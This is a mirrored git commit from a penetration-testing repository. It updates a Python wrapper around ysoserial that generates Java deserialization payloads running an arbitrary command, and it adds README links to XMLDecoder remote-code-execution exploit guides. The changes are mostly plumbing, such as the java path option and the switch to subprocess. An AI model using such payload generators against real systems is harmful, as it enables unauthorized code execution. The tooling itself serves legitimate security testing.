mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-25 12:01:37 +01:00
Merge branch 'master' of github.com:mgeeky/Penetration-Testing-Tools
This commit is contained in:
commit
e3dd009c0e
@ -78,3 +78,7 @@ Then the payload would look like:
|
|||||||
</void>
|
</void>
|
||||||
</java>
|
</java>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
For more payloads and guides how to leverage **XMLDecoder** deserialization vulnerability, one can refer to following good quality sources:
|
||||||
|
- http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
|
||||||
|
- https://github.com/o2platform/DefCon_RESTing/tree/master/Demos/_O2_Scripts/XmlEncoder%20-%20Restlet/exploits
|
||||||
|
@ -63,17 +63,18 @@ import re
|
|||||||
import sys
|
import sys
|
||||||
import base64
|
import base64
|
||||||
import urllib
|
import urllib
|
||||||
import commands
|
import subprocess
|
||||||
import argparse
|
import argparse
|
||||||
from sys import platform
|
from sys import platform
|
||||||
|
|
||||||
VERSION = '0.1'
|
VERSION = '0.2'
|
||||||
|
|
||||||
config = {
|
config = {
|
||||||
'verbose' : True,
|
'verbose' : True,
|
||||||
'debug' : True,
|
'debug' : True,
|
||||||
|
|
||||||
'ysoserial-path' : '',
|
'ysoserial-path' : '',
|
||||||
|
'java-path' : '',
|
||||||
'command' : '',
|
'command' : '',
|
||||||
|
|
||||||
# Do not modify below ones
|
# Do not modify below ones
|
||||||
@ -240,7 +241,8 @@ def generate(name, cmd):
|
|||||||
redir = '2>NULL_STREAM'
|
redir = '2>NULL_STREAM'
|
||||||
|
|
||||||
cmd2 = processCmd(cmd, name, gadget)
|
cmd2 = processCmd(cmd, name, gadget)
|
||||||
out = shell('java -jar {ysoserial} {gadget} "{command}" {redir}'.format(
|
out = shell('"{java}" -jar "{ysoserial}" {gadget} "{command}" {redir}'.format(
|
||||||
|
java = config['java-path'],
|
||||||
ysoserial = config['ysoserial-path'],
|
ysoserial = config['ysoserial-path'],
|
||||||
gadget = gadget,
|
gadget = gadget,
|
||||||
command = cmd2,
|
command = cmd2,
|
||||||
@ -284,6 +286,9 @@ def processShellCmd(cmd):
|
|||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
||||||
|
# Strip "2>nul" part as we switched from commands.getstatusoutput to subprocess.Popen
|
||||||
|
cmd = cmd.replace(" 2>NULL_STREAM", "")
|
||||||
|
|
||||||
for k, v in replaces.items():
|
for k, v in replaces.items():
|
||||||
if k in cmd:
|
if k in cmd:
|
||||||
cmd = cmd.replace(k, v[config['platform']])
|
cmd = cmd.replace(k, v[config['platform']])
|
||||||
@ -292,11 +297,16 @@ def processShellCmd(cmd):
|
|||||||
|
|
||||||
def shell(cmd, noOut = False):
|
def shell(cmd, noOut = False):
|
||||||
cmd = processShellCmd(cmd)
|
cmd = processShellCmd(cmd)
|
||||||
out = commands.getstatusoutput(cmd)[1]
|
out, err = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
|
||||||
|
|
||||||
|
if not out and err:
|
||||||
|
out = err
|
||||||
|
|
||||||
if not noOut:
|
if not noOut:
|
||||||
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
|
Logger.dbg('shell(\'{}\') returned:\n"{}"\n'.format(cmd, out))
|
||||||
else:
|
else:
|
||||||
Logger.dbg('shell("{}")\n'.format(cmd))
|
Logger.dbg('shell(\'{}\')\n'.format(cmd))
|
||||||
|
|
||||||
return out
|
return out
|
||||||
|
|
||||||
def tryToFindYsoserial():
|
def tryToFindYsoserial():
|
||||||
@ -317,10 +327,32 @@ def tryToFindYsoserial():
|
|||||||
|
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
def tryToFindJava():
|
||||||
|
global config
|
||||||
|
if config['java-path']:
|
||||||
|
return True
|
||||||
|
|
||||||
|
out = shell('WHICH_COMMAND java 2>NULL_STREAM')
|
||||||
|
out1 = ''
|
||||||
|
|
||||||
|
if out:
|
||||||
|
out1 = out.split('\n')[0].strip()
|
||||||
|
|
||||||
|
if out1 and os.path.isfile(out1):
|
||||||
|
config['java-path'] = out1
|
||||||
|
else:
|
||||||
|
Logger.err('Could not find "java" interpreter in neither PATH nor current directory.')
|
||||||
|
Logger.err('Please specify where to find "java" using "-j" option.')
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
return True
|
||||||
|
|
||||||
def collectGadgets():
|
def collectGadgets():
|
||||||
global config
|
global config
|
||||||
|
|
||||||
out = shell('java -jar {} --help'.format(config['ysoserial-path']))
|
out = shell('"{}" -jar "{}" --help'.format(
|
||||||
|
config['java-path'], config['ysoserial-path']))
|
||||||
|
|
||||||
rex = re.compile(r'^\s+(\w+)\s+@\w+.+', re.I|re.M)
|
rex = re.compile(r'^\s+(\w+)\s+@\w+.+', re.I|re.M)
|
||||||
gadgets = rex.findall(out)
|
gadgets = rex.findall(out)
|
||||||
Logger.info('Available gadgets ({}): {}\n'.format(len(gadgets), ", ".join(gadgets)))
|
Logger.info('Available gadgets ({}): {}\n'.format(len(gadgets), ", ".join(gadgets)))
|
||||||
@ -359,7 +391,8 @@ def parseOptions(argv):
|
|||||||
|
|
||||||
parser.add_argument('-s', '--onefile', action='store_true', help='Output every generated payload to the same file, starting from newline. Makes sense to use with base64 encoding option set (default: False).')
|
parser.add_argument('-s', '--onefile', action='store_true', help='Output every generated payload to the same file, starting from newline. Makes sense to use with base64 encoding option set (default: False).')
|
||||||
|
|
||||||
parser.add_argument('-y', '--ysoserial', metavar='PATH', default='', help='Specifies path to ysoserial.jar file to use. If left empty, will try the one from current directory (or PATH environment variable)')
|
parser.add_argument('-y', '--ysoserial', metavar='PATH', default='', help='Specifies path to ysoserial.jar file to use. If left empty, will try the one from current directory (or PATH environment variable). Also, you can download latest ysoserial.jar from official JitPack: https://jitpack.io/com/github/frohoff/ysoserial/master/ysoserial-master.jar')
|
||||||
|
parser.add_argument('-j', '--java', metavar='PATH', default='', help='Specifies path to java program to use. If left empty, will try the one from current directory (or PATH environment variable)')
|
||||||
|
|
||||||
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
|
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
|
||||||
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
|
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
|
||||||
@ -409,6 +442,25 @@ def parseOptions(argv):
|
|||||||
else:
|
else:
|
||||||
tryToFindYsoserial()
|
tryToFindYsoserial()
|
||||||
|
|
||||||
|
if args.java:
|
||||||
|
config['java-path'] = args.java
|
||||||
|
else:
|
||||||
|
tryToFindJava()
|
||||||
|
|
||||||
|
ver = shell('"{}" -version'.format(config['java-path']))
|
||||||
|
m = re.search(r'java version "([^"]+)"', ver)
|
||||||
|
if m:
|
||||||
|
ver = "java version " + m.group(1)
|
||||||
|
else:
|
||||||
|
if '\r' in ver:
|
||||||
|
ver = ver.strip().split('\r\n')[0].strip()
|
||||||
|
else:
|
||||||
|
ver = ver.strip().split('\n')[0].strip()
|
||||||
|
Logger.info("Using {}: '{}'".format(
|
||||||
|
ver,
|
||||||
|
config['java-path']
|
||||||
|
))
|
||||||
|
|
||||||
return args
|
return args
|
||||||
|
|
||||||
def main(argv):
|
def main(argv):
|
||||||
|
Loading…
Reference in New Issue
Block a user